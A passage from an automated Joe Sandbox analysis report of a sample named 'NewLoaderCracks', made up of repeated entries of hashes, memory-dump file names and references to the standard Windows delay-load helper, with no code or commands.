                • Instruction Fuzzy Hash: 12B012E326C002AD312C62097C6BF3A0E6CF8C1B53330841BB90DD00C0D4405C0C5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c64a7f4c740e9cb35c96fa972be7ee4099ee3ccc6b41b043c6747507cb075493
                • Instruction ID: 825f875207ada3f7e4d731022cfba964a20b20c2181a163088ee6c239ebd23fa
                • Opcode Fuzzy Hash: c64a7f4c740e9cb35c96fa972be7ee4099ee3ccc6b41b043c6747507cb075493
                • Instruction Fuzzy Hash: FAB012E326C102AD316862087C6BF3A0E6CF8C1B53330851BB90DD00C0D4405C4C5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: bd3562faaba2e7e7ad0128805e6bd753d796a7ecf2b47687946017a93126a0c0
                • Instruction ID: bdc40abbb713cc8368282a20e4fa7120cca63bbaf16108043c7d2852caa3fdf7
                • Opcode Fuzzy Hash: bd3562faaba2e7e7ad0128805e6bd753d796a7ecf2b47687946017a93126a0c0
                • Instruction Fuzzy Hash: 6BB09296268202AD31282204A8AAA3A0A28E8C1B52320892BB809A008095405C4C9831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9099780e1ea88a6ac6786eb5cbde5da0179e9edde5fc1838c49928a73e1c5658
                • Instruction ID: 9e4fafe0cbe9a12e1c37c58fdbeb882c9b46f2167b7f494d106f4f8b856edce1
                • Opcode Fuzzy Hash: 9099780e1ea88a6ac6786eb5cbde5da0179e9edde5fc1838c49928a73e1c5658
                • Instruction Fuzzy Hash: 0CB0129326C002AD312862087C6BF3A0E6CF8C2B53330C41FBC0DD01C0D4405C0E5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9baeafdec5697f46f783c462b89251ccb6edbacbd1fb85bd35a1a32d27a73b42
                • Instruction ID: 14a6d749fe3349cc3e46484ed8f73d6b3e05223e10255028bfa2b5adb7d1eff2
                • Opcode Fuzzy Hash: 9baeafdec5697f46f783c462b89251ccb6edbacbd1fb85bd35a1a32d27a73b42
                • Instruction Fuzzy Hash: 46B0129726C102AD31286208BCABF3F0E6CF8C1B53330C41BB80DD00C0D4405C0C5931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 17a7d26da32d3f225e3ca261f0acb139dd4615d9ca2dace9f1002396ac5a50f6
                • Instruction ID: cadbeb0dc89c9513c126bf8847dd2c2a51c388656b493667bd1587e04f2d5379
                • Opcode Fuzzy Hash: 17a7d26da32d3f225e3ca261f0acb139dd4615d9ca2dace9f1002396ac5a50f6
                • Instruction Fuzzy Hash: D5B092A2268002AD31286208696AA3A0AA8E8C1B52720842BB809D0080D44058095931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 377c59f647a82b3a9674d07e2a3998b382605cf03b254ce83755ad1c76e0bfc9
                • Instruction ID: 4c81ffb15da60821adfb835f47ef024908c712953a05e301674f1e4c5da3c04b
                • Opcode Fuzzy Hash: 377c59f647a82b3a9674d07e2a3998b382605cf03b254ce83755ad1c76e0bfc9
                • Instruction Fuzzy Hash: 0CB012A766D102AD31A863087C6BF3A0E6EF8C1B53730851BB80DD00C0D4405C4C5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b5074ea2b37f6c97e3a13d27621ee2ca95df331334f388ddadb91c902e0585e1
                • Instruction ID: 2597ef5199c8c735e12d9043482a4ea88d2358602679064337050fd513cf6448
                • Opcode Fuzzy Hash: b5074ea2b37f6c97e3a13d27621ee2ca95df331334f388ddadb91c902e0585e1
                • Instruction Fuzzy Hash: 76B0129366D002AD316862087C6BF3A0E6EF8C2B53730C41BBC0DD00C0D4405C0D6831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5abf09dae56f2bcf81bce5510d8abd1579e40ae49e1a1f39cbd10cdc0ce30e46
                • Instruction ID: f3cb6c5336c314aae34b6eb65d9c6033334abbba28bbe8099c93f1d020d37ce6
                • Opcode Fuzzy Hash: 5abf09dae56f2bcf81bce5510d8abd1579e40ae49e1a1f39cbd10cdc0ce30e46
                • Instruction Fuzzy Hash: 19B0129367D002AD316862087C6BF3A0EAEFCC1B53730841BB80DD00C0D4405C0C5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055D8A3
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 97f403cd0111426a416c4d77ad634985d5a13b6fa487f08e04514b648bffbbb6
                • Instruction ID: 039e6dcd228f71c8c580b0bc54e3fbe8c5b39b985a878ac3830b283187464651
                • Opcode Fuzzy Hash: 97f403cd0111426a416c4d77ad634985d5a13b6fa487f08e04514b648bffbbb6
                • Instruction Fuzzy Hash: 32B0129326C002AD312862187C6BF3A0EACF8C2B53330C42BBD0DD00C0D5405C0D5D31
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055E20B
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d98cbfade1422822944a721477113e217719fd7ff3b137b2f75ebad70eadeceb
                • Instruction ID: b326948568eaae672989707ad5c40a36f963aad0c5c987578428628d388b8c18
                • Opcode Fuzzy Hash: d98cbfade1422822944a721477113e217719fd7ff3b137b2f75ebad70eadeceb
                • Instruction Fuzzy Hash: 68B012D626E002BD320C91047D2FD3A0F2CF8C0B92730C41BBD0AD408095405D0D5432
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 887ce051a8139c27651803115995c3c7e6c028850b87e681d656cfdd324564ce
                • Instruction ID: 56b109f1dd36a4025aa7715dd61dca07caaba5655c072394781c261914bd35b5
                • Opcode Fuzzy Hash: 887ce051a8139c27651803115995c3c7e6c028850b87e681d656cfdd324564ce
                • Instruction Fuzzy Hash: ACB092A226C002AD3128A119A82AB3E0AA8F4C4B12320C91BB809C04489444480D5831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5c70a4dad7c014abcad9b93a20a4a5f9d218ce65a148396c7248601691ea781c
                • Instruction ID: 69a3fe47372efa57b73227435ec0970fc9144a73d96adf1e34b1890afcf757fe
                • Opcode Fuzzy Hash: 5c70a4dad7c014abcad9b93a20a4a5f9d218ce65a148396c7248601691ea781c
                • Instruction Fuzzy Hash: BBB092A226C002AD3128A119A82AA3A0AA8F4C0B12320C51BB809C0048D44848085831
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DAB2
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8ee2c56b16d5a28bc8203bd94f5787c86cb6938223f01b36758a093859e22592
                • Instruction ID: 32aac86f909f3d49ea5876b052e0de294a5051363d89ab5689b410eb5fc17a4e
                • Opcode Fuzzy Hash: 8ee2c56b16d5a28bc8203bd94f5787c86cb6938223f01b36758a093859e22592
                • Instruction Fuzzy Hash: 1CB012A32AC102AD3128B11ABC6FF3F0EACF4C0B12330C51BB80DC0448D4844C0C5931
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 6bf21b56b6f3cf78da61d0fbbd758f79e81e6b0f67d30adbf63e5724ac136169
                • Instruction ID: abf532e97ac19907c3ef355fd77eacb422dfb841e472cb6fca23dd89c7497b3e
                • Opcode Fuzzy Hash: 6bf21b56b6f3cf78da61d0fbbd758f79e81e6b0f67d30adbf63e5724ac136169
                • Instruction Fuzzy Hash: 20B0129736C007AD311851583C2FF3A0F7DF4C0B22330842BBC0EC0640D9404C0C5932
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e4f90b4c1a1c78d8d8deed63784be3b2f655c3c17437a8069f79e0ef1bc335f3
                • Instruction ID: be90226049d820e6ea01851cebbab7321c682f19103fa2254cce4487a4657fa5
                • Opcode Fuzzy Hash: e4f90b4c1a1c78d8d8deed63784be3b2f655c3c17437a8069f79e0ef1bc335f3
                • Instruction Fuzzy Hash: FDB0129737C10BBD321812043C2FD3B0F3CF4C0B22330852BBC09D014099404C4C5832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0055DBD5
                  • Part of subcall function 0055DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0055DFD6
                  • Part of subcall function 0055DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0055DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 66d6dd6665a555eb061b0f75ac215d953d234b8730055093a3a970711132be7b
